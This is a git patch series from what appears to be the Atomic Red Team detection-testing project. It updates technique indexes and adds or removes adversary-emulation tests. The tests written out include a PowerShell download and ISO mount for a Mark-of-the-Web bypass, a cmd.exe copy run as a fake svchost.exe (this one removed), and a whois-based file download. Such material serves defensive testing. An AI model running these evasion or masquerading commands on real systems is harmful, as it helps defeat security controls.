test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"t
echniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","scor
e":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabl
ed":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},
{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true
},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true}
,{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techni
queID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index ebe5a1aa..6e8aae4b 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -354,6 +354,7 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat defense-evasion,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt +defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 5d54166f..690fbfdb 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -233,6 +233,7 @@ defense-evasion,T1218.004,InstallUtil,8,InstallUtil evasive invocation,559e6d06- defense-evasion,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt +defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index bb1de4c0..bfb8c069 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -622,7 +622,8 @@ - Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows] - Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows] - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1553.005 Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) + - Atomic Test #1: Mount ISO image [windows] - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md) - Atomic Test #1: Creating W32Time similar named service using schtasks [windows] - Atomic Test #2: Creating W32Time similar named service using sc [windows] 
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 5b6382dc..e53dfb2f 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -439,7 +439,8 @@ - Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows] - Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows] - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1553.005 Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) + - Atomic Test #1: Mount ISO image [windows] - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md) - Atomic Test #1: Creating W32Time similar named service using schtasks [windows] - Atomic Test #2: Creating W32Time similar named service using sc [windows] diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index 558cd917..a8def1e4 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md 
@@ -76,7 +76,7 @@ | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | | | | | [Port Monitors](../../T1547.010/T1547.010.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | | | | | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | | | | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | | | | | [RC Scripts](../../T1037.004/T1037.004.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) | | | | | | | | | | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md index 2448302b..ee76ea53 100644 --- a/atomics/Indexes/Matrices/windows-matrix.md +++ b/atomics/Indexes/Matrices/windows-matrix.md 
@@ -57,7 +57,7 @@ | | | [Port Monitors](../../T1547.010/T1547.010.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | | | | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | | | | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) | | | | | | | | | | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 6715564c..f0f057a6 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -27216,7 +27216,42 @@ defense-evasion: x_mitre_version: '1.0' x_mitre_defense_bypassed: - Anti-virus, Application control - atomic_tests: [] + identifier: T1553.005 + atomic_tests: + - name: Mount ISO image + auto_generated_guid: 002cca30-4778-4891-878a-aaffcfa502fa + description: 'Mounts ISO image downloaded from internet to evade Mark-of-the-Web. + Upon successful execution, powershell will download the .iso from the Atomic + Red Team repo, and mount the image. The provided sample ISO simply has a Reports + shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ + +' + supported_platforms: + - windows + input_arguments: + path_of_iso: + description: Path to ISO file + type: path + default: PathToAtomicsFolder\T1553.005\src\T1553.005.iso + dependency_executor_name: powershell + dependencies: + - description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso}) + +' + prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null + Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/src/T1553.005.iso -OutFile "#{path_of_iso}" + executor: + command: 'Mount-DiskImage -ImagePath "#{path_of_iso}" + +' + cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" + +' + name: powershell T1036.004: technique: external_references: diff --git a/atomics/T1553.005/T1553.005.md b/atomics/T1553.005/T1553.005.md index 50d47c77..c7f2e10e 100644 --- a/atomics/T1553.005/T1553.005.md +++ b/atomics/T1553.005/T1553.005.md @@ -1,10 +1,12 @@ -# T1553.005 - Subvert Trust Controls: Mark-of-the-Web Bypass -## [Description from ATT&CK](https://attack.mitre.org/techniques/T1553/005/) -
Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.
+# T1553.005 - Mark-of-the-Web Bypass +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1553/005) +
Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020) + +Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)
## Atomic Tests -- [Atomic Test #1 - Mount ISO image](#atomic-test-1---mount-iso-image---) +- [Atomic Test #1 - Mount ISO image](#atomic-test-1---mount-iso-image)
@@ -26,21 +28,25 @@ Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon success #### Attack Commands: Run with `powershell`! -``` Mount-DiskImage -ImagePath "#{path_of_iso}"``` +```powershell +Mount-DiskImage -ImagePath "#{path_of_iso}" +``` #### Cleanup Commands: -``` Dismount-DiskImage -ImagePath "#{path_of_iso}"``` +```powershell +Dismount-DiskImage -ImagePath "#{path_of_iso}" +``` #### Dependencies: Run with `powershell`! ##### Description: T1553.005.iso must exist on disk at specified location (#{path_of_iso}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/src/T1553.005.iso -OutFile "#{path_of_iso}" ``` From 09c413e64a57c8ab2ed7eb77bee60ab7e2b9b2ad Mon Sep 17 00:00:00 2001 From: rctgardner <59621072+rctgardner@users.noreply.github.com> Date: Wed, 9 Jun 2021 13:25:13 -0600 Subject: [PATCH 18/84] removed windows test from t1036.005 --- atomics/T1036.005/T1036.005.yaml | 22 ---------------------- 1 file changed, 22 deletions(-) diff --git a/atomics/T1036.005/T1036.005.yaml b/atomics/T1036.005/T1036.005.yaml index 05a1bdd7..4c81dd2d 100644 --- a/atomics/T1036.005/T1036.005.yaml +++ b/atomics/T1036.005/T1036.005.yaml 
@@ -27,25 +27,3 @@ atomic_tests: cleanup_command: | rm -f $HOME/.../sh rmdir $HOME/.../ - -- name: Execute a process masquerading as a legitimate Windows binary - description: | - Create and execute a process masquerading as a legitimate Windows binary - - supported_platforms: - - windows - - input_arguments: - test_message: - description: Test message to echo out to the screen - type: String - default: Hello from the Atomic Red Team test T1036.005#2 - - executor: - name: command_prompt - elevation_required: false - command: | - copy %WINDIR%\System32\cmd.exe /Y %PUBLIC%\svchost.exe - start %PUBLIC%\svchost.exe /C echo "#{test_message}" - cleanup_command: | - del %PUBLIC%\svchost.exe >nul 2>&1 From 1a3c693394c3088e518252c48eb87188f25c8052 Mon Sep 17 00:00:00 2001 From: rctgardner <59621072+rctgardner@users.noreply.github.com> Date: Wed, 9 Jun 2021 13:28:07 -0600 Subject: [PATCH 19/84] added 'whois file download' test to T1005 --- atomics/T1105/T1105.yaml | 47 +++++++++++++++++++++++++++++++++++++++- 1 file changed, 46 insertions(+), 1 deletion(-) diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index 8a7c65e2..b35c9434 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -304,7 +304,7 @@ atomic_tests: Uses the Windows Defender to download a file from the internet (must have version 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 installed). The input arguments "remote_file" and "local_path" can be used to specify the download URL and the name of the output file. By default, the test downloads the Atomic Red Team license file to the temp directory. - + More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/ supported_platforms: - windows 
@@ -335,3 +335,48 @@ atomic_tests:
 del #{local_path} >nul 2>&1
 del %temp%\MpCmdRun.log >nul 2>&1
 name: command_prompt
+- name: whois file download
+ description: |
+ Download a remote file using the whois utility
+
+ supported_platforms:
+ - linux
+ - macos
+
+ input_arguments:
+ remote_host:
+ description: Remote hostname or IP address
+ type: String
+ default: localhost
+ remote_port:
+ description: Remote port to connect to
+ type: Integer
+ default: 8443
+ output_file:
+ description: Path of file to save output to
+ type: Path
+ default: /tmp/T1105.whois.out
+ query:
+ description: Query to send to remote server
+ type: String
+ default: "Hello from Atomic Red Team test T1105"
+ timeout:
+ description: Timeout period before ending process (seconds)
+ type: Integer
+ default: 1
+
+ dependencies:
+ - description: |
+ The whois and timeout commands must be present
+ prereq_command: |
+ which whois && which timeout
+ get_prereq_command: |
+ echo "Please install timeout and the whois package"
+
+ executor:
+ name: sh
+ elevation_required: false
+ command: |
+ timeout #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file}
+ cleanup_command: |
+ rm -f #{output_file}
